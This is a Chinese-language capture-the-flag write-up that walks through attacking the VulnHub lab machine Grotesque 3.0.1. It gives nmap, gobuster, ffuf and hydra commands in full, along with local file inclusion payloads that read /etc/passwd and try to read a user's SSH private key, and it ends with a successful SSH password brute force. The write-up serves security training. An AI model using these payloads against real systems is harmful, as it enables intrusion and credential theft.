vulnhub靶場之GROTESQUE: 3.0.1

upfine發表於2022-12-24

準備：

攻擊機：虛擬機器kali、本機win10。

靶機：Grotesque: 3.0.1，下載地址：https://download.vulnhub.com/grotesque/grotesque3.zip，下載後直接vbox開啟即可。

知識點：ffuf引數爆破、定時任務、445埠利用、smbclient使用。

vulnhub靶場之GROTESQUE: 3.0.1

資訊收集：

透過nmap掃描下網段內的存活主機地址，確定下靶機的地址：nmap -sn 172.20.10.0/24，獲得靶機地址：172.20.10.4。

vulnhub靶場之GROTESQUE: 3.0.1

掃描下埠對應的服務：nmap -T4 -sV -p- -A 172.20.10.4，顯示開放了22、80埠，開啟了ssh、http服務

vulnhub靶場之GROTESQUE: 3.0.1

目錄掃描：

使用dirmap進行目錄掃描，發現atlasg.jpg圖片，emmmm，訪問80埠的時候也能直接檢視到該圖片。

vulnhub靶場之GROTESQUE: 3.0.1

檢視該圖片利用steghide嘗試獲取隱藏資訊，但是獲取失敗，後來發現一個提示資訊：m、d和五個x，應該是告訴我們和md5有關。

vulnhub靶場之GROTESQUE: 3.0.1

根據提示生成一個md5字典，這裡我們將/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt字典進行md5加密，命令：for i in $(cat directory-list-lowercase-2.3-medium.txt); do echo $i | md5sum >> dirmd5.txt; done。記得替換裡面的橫線和空格。然後使用gobuster進行目錄掃描，發現：/f66b22bf020334b04c7d0d3eb5010391.php。

vulnhub靶場之GROTESQUE: 3.0.1

引數名爆破：

訪問：http://172.20.10.4/f66b22bf020334b04c7d0d3eb5010391.php無任何回顯資訊，原始碼資訊中也無任何資訊。因此嘗試使用ffuf進行引數爆破，命令：fuzf -f -u 'http://172.20.10.4/f66b22bf020334b04c7d0d3eb5010391.php?FUZZ=../../../../../../etc/passwd' -w /usr/share/seclists/Discovery/Web-Content/common.txt，但是未掃描出來，然後更換字典，命令：ffuf -u 'http://172.20.10.4/f66b22bf020334b04c7d0d3eb5010391.php?FUZZ=../../../../../../etc/passwd' -w /usr/share/wordlists/dirb/big.txt，發現了引數名：purpose。

vulnhub靶場之GROTESQUE: 3.0.1

爆破ssh密碼：

讀取/etc/passwd檔案，發現賬戶名：freddie。

vulnhub靶場之GROTESQUE: 3.0.1

使用檔案包含漏洞讀取下ssh私匙和公匙均讀取失敗，命令：http://172.20.10.4/f66b22bf020334b04c7d0d3eb5010391.php?purpose=php://filter/read=convert.base64-encode/resource=/home/freddie/.ssh/id_rsa和http://172.20.10.4/f66b22bf020334b04c7d0d3eb5010391.php?purpose=php://filter/read=convert.base64-encode/resource=/home/freddie/.ssh/id_rsa.pub，然後嘗試下使用md5字典爆破下ssh密碼，命令：hydra -l freddie -P dirmd5.txt ssh://172.20.10.4，成功獲得freddie賬戶的ssh登入密碼：61a4e3e60c063d1e472dd780f64e6cad。

vulnhub靶場之GROTESQUE: 3.0.1